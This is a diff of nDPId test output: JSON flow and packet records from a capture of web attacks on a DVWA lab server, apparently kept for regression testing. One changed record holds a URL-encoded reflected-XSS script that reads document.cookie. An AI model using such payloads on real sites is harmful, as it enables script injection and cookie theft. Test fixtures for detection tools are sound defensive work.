00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -305,7 +305,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1499347088552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA892FAAD4Gzm6sEAABwKgKMtDyAFAECKqUAAAAAKACchB\/9gAAAgQFtAQCCAoBOV31AAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1499347088552,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347088552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0PJdbGlkBAiqlaAScSCGtgAAAgQFtAQCCAoD4y9rATld9QEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1499347088553,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347088553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA092JAAD4GznWsEAABwKgKMtDyAFAECKqVXWxpZYAQAOUlvgAAAQEICgE5XfUD4y9r"} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1499346956870,"flow_last_seen":1499346960891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7926,"flow_tot_l4_payload_len":16625,"flow_avg_l4_payload_len":503,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1499346956870,"flow_last_seen":1499346960891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7926,"flow_tot_l4_payload_len":16625,"flow_avg_l4_payload_len":503,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346956932,"flow_last_seen":1499346960891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -340,7 +340,7 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1499347101314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HlBAAD4Gp4CsEAABwKgKMtF4AFDPTHQ7AAAAAKACchDeDgAAAgQFtAQCCAoBOWprAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1499347101314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0XjCGItuz0x0PKAScSBRoQAAAgQFtAQCCAoD4zviATlqawEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1499347101315,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347101315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HlFAAD4Gp4esEAABwKgKMtF4AFDPTHQ8whiLb4AQAOXwqAAAAQEICgE5amsD4zvi"} -00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347097460,"flow_last_seen":1499347102358,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347102358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347097460,"flow_last_seen":1499347102358,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347102358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347102609,"flow_last_seen":1499347102609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347102609,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1499347102609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ux5AAD4GCrKsEAABwKgKMtGGAFBKzdCxAAAAAKACchAExgAAAgQFtAQCCAoBOWuvAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1499347102609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0YYGn50FSs3QsqAScSAg+AAAAgQFtAQCCAoD4z0lATlrrwEDAwc="} @@ -357,8 +357,8 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1499347107719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMdAAD4GrQmsEAABwKgKMtG8AFANSWhrAAAAAKACchClXQAAAgQFtAQCCAoBOXCsAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1499347107719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0byrN2AMDUlobKAScSBU8gAAAgQFtAQCCAoD40IjATlwrAEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1499347107720,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347107720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GMhAAD4GrRCsEAABwKgKMtG8AFANSWhsqzdgDYAQAOXz+AAAAQEICgE5cK0D40Ij"} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1499346976677,"flow_last_seen":1499346982914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5330,"flow_tot_l4_payload_len":6852,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499346976999,"flow_last_seen":1499346982906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1707,"flow_tot_l4_payload_len":2065,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1499346976677,"flow_last_seen":1499346982914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5330,"flow_tot_l4_payload_len":6852,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499346976999,"flow_last_seen":1499346982906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1707,"flow_tot_l4_payload_len":2065,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -535,7 +535,7 @@ 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499346976603,"flow_last_seen":1499347036773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4344,"flow_tot_l4_payload_len":231560,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499346976603,"flow_last_seen":1499347036773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4344,"flow_tot_l4_payload_len":231560,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347163177,"flow_last_seen":1499347163177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347163177,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1499347163177,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YKVAAD4GZSusEAABwKgKMtP8AFCcucZwAAAAAKACchB\/fgAAAgQFtAQCCAoBOabVAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1499347163177,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0\/zGVu0LnLnGcaAScSBQzAAAAgQFtAQCCAoD43hLATmm1QEDAwc="} @@ -548,7 +548,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1499347165741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vRVAAD4GCLusEAABwKgKMtQYAFCo9hRDAAAAAKACchAi0gAAAgQFtAQCCAoBOalWAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1499347165741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1BjYjd6VqPYURKAScSDt3QAAAgQFtAQCCAoD43rMATmpVgEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1499347165742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347165742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vRZAAD4GCMKsEAABwKgKMtQYAFCo9hRE2I3eloAQAOWM5QAAAQEICgE5qVYD43rM"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347163177,"flow_last_seen":1499347167004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347167004,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%270XVM4C1CNSWY8VF443GGZ6W527WBY4H29E2XQNGG2QUPQEKW0U%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347163177,"flow_last_seen":1499347167004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347167004,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%270XVM4C1CNSWY8VF443GGZ6W527WBY4H29E2XQNGG2QUPQEKW0U%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 